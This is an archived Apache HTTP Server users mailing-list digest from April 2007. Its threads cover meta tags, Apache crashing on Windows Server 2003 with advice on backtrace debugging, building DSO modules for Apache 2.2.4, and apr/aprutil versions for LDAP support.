
-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



Re: [EMAIL PROTECTED] Meta tags: keywords and description

2007-04-03 Thread Dragon

Curtis Vaughan wrote:

It is my understanding that the metatag "Keywords" is not really used by
search engine crawlers any more, and that description is the better to
use. Could someone confirm that?

Also, I wondering about the syntax for these. For example, I am looking at
the description for a law firm. It has:

"General business law, commercial transactions, real estate, contracts,
new entity formation.  Wills, trusts & estate planning.  Immigration:
Employer Petitions, Business Immigration, Family Petitions, Permanent
Residency & Naturalizations."

In the first place I thought periods were not really used. Also, it was my
understand that you should keep it simple. This description seems rather
complicated. Not to mention misspellings.

 End original message. -

I'm not trying to be rude, but I don't believe that this is the 
appropriate forum for this as your questions have nothing to do with 
the Apache web server. I suggest finding ones dealing with web design 
and search engines to ask such questions. Ironically, searching the 
web is likely to turn up far more useable info for you than you are 
likely to get here.


I would also suggest starting at http://www.w3c.org/ for any 
questions regarding page markup syntax. None of which is directly 
related to the Apache web server.




Dragon

~~~
 Venimus, Saltavimus, Bibimus (et naribus canium capti sumus)
~~~


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



[EMAIL PROTECTED] apache crashing on windows server 2003

2007-04-03 Thread Eben

Hello,

I am running apache 2.0.57 on windows server 2003.  I have php 4.4.2 
setup as a module and mod_rewrite enabled.  The platform is an HP blade 
server.  This is a dedicated environment which runs only one single web 
application that performs some fairly heavy queries against a mysql 
database, but overall load is very light, with at most 1 or two users 
ever connected at a time.  Several times a day Apache crashes, and 
restarts without warning.  Whenever I login to the server I am greeted 
by a bunch of error events...


I am seeing this error report in the Event Viewer for each time it crashes:
Faulting application Apache.exe, version 0.0.0.0, faulting module 
unknown, version 0.0.0.0, fault address 0x


And in apache's error log at the corresponding times:
[Tue Apr 03 08:19:54 2007] [info] master_main: Child processed exited 
prematurely. Restarting the child process.

[Tue Apr 03 08:19:54 2007] [info] Parent: Created child process 5092
[Tue Apr 03 08:19:54 2007] [info] Parent: Duplicating socket 464 and 
sending it to child process 5092

[Tue Apr 03 08:19:54 2007] [info] BytesRead = 372 WSAProtocolInfo = 2006620

My suspicion is that it has something to do with the web app that is 
running, and specific usage.  My question is, as someone who is more 
used to operating in unix environments, how else can I debug this, what 
other tools or techniques are available for windows that might help me 
to track down what is causing these crashes/restarts?


Any advice is appreciated,
Eben

-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



[EMAIL PROTECTED] Shared object (.so) creation in apache 2.2.4 II

2007-04-03 Thread Alan Wilcox




I have just installed apache 2.2.4 on a unix system.
A number of modules we had enabled as DSOs on apache 1.3 are now shown as
not installed by the
configure/make process. Shown on the right.

I do have some (not all) of the source modules in the ./httpd-2.2.4
/modules/metadata directory
unloaded withthe tar ball. I have not had success in compling any of these
using DSO procedures
I found in the 1.3 documentation.

Any suggestions on how to source the modules listed as 'no' or 'not found'
on the right below,
and then compile to create the corresponding "mod*.so" shared object is
appreciated.

cid07:/usr/local/lib/apache# ls -l
Enabled on configure command
total 1552
-rw-r--r--   1 root system 7298 Feb 28 2000  httpd.exp
-rwxr-xr-x   1 root system   124948 Feb 28 2000  libproxy.so
-rwxr-xr-x   1 root system10774 Feb 28 2000  mod_access.so
Not found in config.log
-rwxr-xr-x   1 root system10040 Feb 28 2000  mod_actions.so
Yes
-rwxr-xr-x   1 root system12936 Feb 28 2000  mod_alias.so
Yes
-rwxr-xr-x   1 root system 5319 Feb 28 2000  mod_asis.so
Yes
-rwxr-xr-x   1 root system13084 Feb 28 2000  mod_auth.so
Yes as mod_authn
-rwxr-xr-x   1 root system 7586 Feb 28 2000  mod_auth_anon.so
No (mod_authn_anon)
-rwxr-xr-x   1 root system10789 Feb 28 2000  mod_auth_dbm.so
No (mod_authn_dbm)
-rwxr-xr-x   1 root system42760 Feb 28 2000  mod_autoindex.so
Yes
-rwxr-xr-x   1 root system11072 Feb 28 2000  mod_cern_meta.so
No
-rwxr-xr-x   1 root system23943 Feb 28 2000  mod_cgi.so
Yes
-rwxr-xr-x   1 root system13612 Feb 28 2000  mod_digest.so
No (mod_auth_digest)
-rwxr-xr-x   1 root system 7847 Feb 28 2000  mod_dir.so
Yes
-rwxr-xr-x   1 root system 7540 Feb 28 2000  mod_env.so
Yes
-rwxr-xr-x   1 root system11244 Feb 28 2000  mod_expires.so
No
-rwxr-xr-x   1 root system 6841 Feb 28 2000  mod_headers.so
No
-rwxr-xr-x   1 root system21931 Feb 28 2000  mod_imap.so
Not found in config.log
(mod_imagemap = No)
-rwxr-xr-x   1 root system54643 Feb 28 2000  mod_include.so
Yes
-rwxr-xr-x   1 root system23164 Feb 28 2000  mod_info.so
No
-rwxr-xr-x   1 root system27670 Feb 28 2000  mod_log_config.so
Yes
-rwxr-xr-x   1 root system21679 Feb 28 2000  mod_mime.so
Yes
-rwxr-xr-x   1 root system34935 Feb 28 2000  mod_mime_magic.so
No
-rwxr-xr-x   1 root system42295 Feb 28 2000  mod_negotiation.so
Yes
-rwxr-xr-x   1 root system87523 Feb 28 2000  mod_rewrite.so
No
-rwxr-xr-x   1 root system11942 Feb 28 2000  mod_setenvif.so
Yes
-rwxr-xr-x   1 root system16097 Feb 28 2000  mod_speling.so
No
-rwxr-xr-x   1 root system28832 Feb 28 2000  mod_status.so
Yes
-rwxr-xr-x   1 root system 8080 Feb 28 2000  mod_unique_id.so
No
-rwxr-xr-x   1 root system 9455 Feb 28 2000  mod_userdir.so
Not found in config.log
-rwxr-xr-x   1 root system11878 Feb 28 2000  mod_usertrack.so
No
-rwxr-xr-x   1 root system 9400 Feb 28 2000  mod_vhost_alias.so
No


Thank you.

Alan M. Wilcox/[EMAIL PROTECTED]  Senior Consulting I/T Specialist   STG
Lab services for System p5
 512-823-7600 /   512-633-8579

"Management is doing things right . Leadership is doing the right
things"  Peter Drucker Business Consultant

Re: [EMAIL PROTECTED] apache crashing on windows server 2003

2007-04-03 Thread William A. Rowe, Jr.
Eben wrote:
> Hello,
> 
> I am running apache 2.0.57 on windows server 2003.  I have php 4.4.2
> setup as a module and mod_rewrite enabled.

I hope not - 2.0.57 was never released.  Went from .56 to .59

> I am seeing this error report in the Event Viewer for each time it crashes:
> Faulting application Apache.exe, version 0.0.0.0, faulting module
> unknown, version 0.0.0.0, fault address 0x
> 
> And in apache's error log at the corresponding times:
> [Tue Apr 03 08:19:54 2007] [info] master_main: Child processed exited
> prematurely. Restarting the child process.
> [Tue Apr 03 08:19:54 2007] [info] Parent: Created child process 5092
> [Tue Apr 03 08:19:54 2007] [info] Parent: Duplicating socket 464 and
> sending it to child process 5092
> [Tue Apr 03 08:19:54 2007] [info] BytesRead = 372 WSAProtocolInfo = 2006620
> 
> My suspicion is that it has something to do with the web app that is
> running, and specific usage.  My question is, as someone who is more
> used to operating in unix environments, how else can I debug this, what
> other tools or techniques are available for windows that might help me
> to track down what is causing these crashes/restarts?

That's the fun question to answer.  Unpack the -symbols.zip of the EXACT
apache server version you are using.

Now, drwtsn32.exe can give you something legible about what crashed where.
There are a few notes here

http://www.apache.org/dist/httpd/binaries/win32/#source
http://httpd.apache.org/dev/debugging.html#backtrace-win

You can ignore the comments about forcing a backtrace - because you are
looking at letting the server simply crash.

Without knowing what the backtrace looks like, it's hard to tell what
module caused the exception (it will always 'say' apache.exe caused
the fault, because that is the program running), and in what context
(which is why the full backtrace is so interesting.)


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



Re: [EMAIL PROTECTED] apache crashing on windows server 2003

2007-04-03 Thread Cary Conover

This is from My Blackberry.


- Original Message -
From: "William A. Rowe, Jr." [EMAIL PROTECTED]
Sent: 04/03/2007 03:03 PM EST
To: users@httpd.apache.org
Subject: Re: [EMAIL PROTECTED] apache crashing on windows server 2003



Eben wrote:
> Hello,
>
> I am running apache 2.0.57 on windows server 2003.  I have php 4.4.2
> setup as a module and mod_rewrite enabled.

I hope not - 2.0.57 was never released.  Went from .56 to .59

> I am seeing this error report in the Event Viewer for each time it crashes:
> Faulting application Apache.exe, version 0.0.0.0, faulting module
> unknown, version 0.0.0.0, fault address 0x
>
> And in apache's error log at the corresponding times:
> [Tue Apr 03 08:19:54 2007] [info] master_main: Child processed exited
> prematurely. Restarting the child process.
> [Tue Apr 03 08:19:54 2007] [info] Parent: Created child process 5092
> [Tue Apr 03 08:19:54 2007] [info] Parent: Duplicating socket 464 and
> sending it to child process 5092
> [Tue Apr 03 08:19:54 2007] [info] BytesRead = 372 WSAProtocolInfo = 2006620
>
> My suspicion is that it has something to do with the web app that is
> running, and specific usage.  My question is, as someone who is more
> used to operating in unix environments, how else can I debug this, what
> other tools or techniques are available for windows that might help me
> to track down what is causing these crashes/restarts?

That's the fun question to answer.  Unpack the -symbols.zip of the EXACT
apache server version you are using.

Now, drwtsn32.exe can give you something legible about what crashed where.
There are a few notes here

http://www.apache.org/dist/httpd/binaries/win32/#source
http://httpd.apache.org/dev/debugging.html#backtrace-win

You can ignore the comments about forcing a backtrace - because you are
looking at letting the server simply crash.

Without knowing what the backtrace looks like, it's hard to tell what
module caused the exception (it will always 'say' apache.exe caused
the fault, because that is the program running), and in what context
(which is why the full backtrace is so interesting.)


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]




-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
   "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]



Re: [EMAIL PROTECTED] Re: apache2 with modules ldap

2007-04-03 Thread Cary Conover


This is from My Blackberry.


- Original Message -
From: "Karunakar Reddy G" [EMAIL PROTECTED]
Sent: 04/03/2007 02:18 PM AST
To: users@httpd.apache.org
Subject: Re: [EMAIL PROTECTED] Re: apache2 with modules ldap



I used source code for *apr* and *aprutil*

apr-1.2.8.tar.gz
apr-util-1.2.8.tar.gz

Thanks
Karunakar


On 4/3/07, paul <[EMAIL PROTECTED]> wrote:


Karunakar Reddy G schrieb:
> Hi ,
>
> I am new to the list ,
>
> I successfully compiled and installed *apr* and *aprutil *source
code  with
> following configure options
Which versions? Have you checked your apr/aprutil versions meet the
requirements for apache-2.2.4?

cheers
Paul


-
The official User-To-User support forum of the Apache HTTP Server Project.
See http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: [EMAIL PROTECTED]
  "   from the digest: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]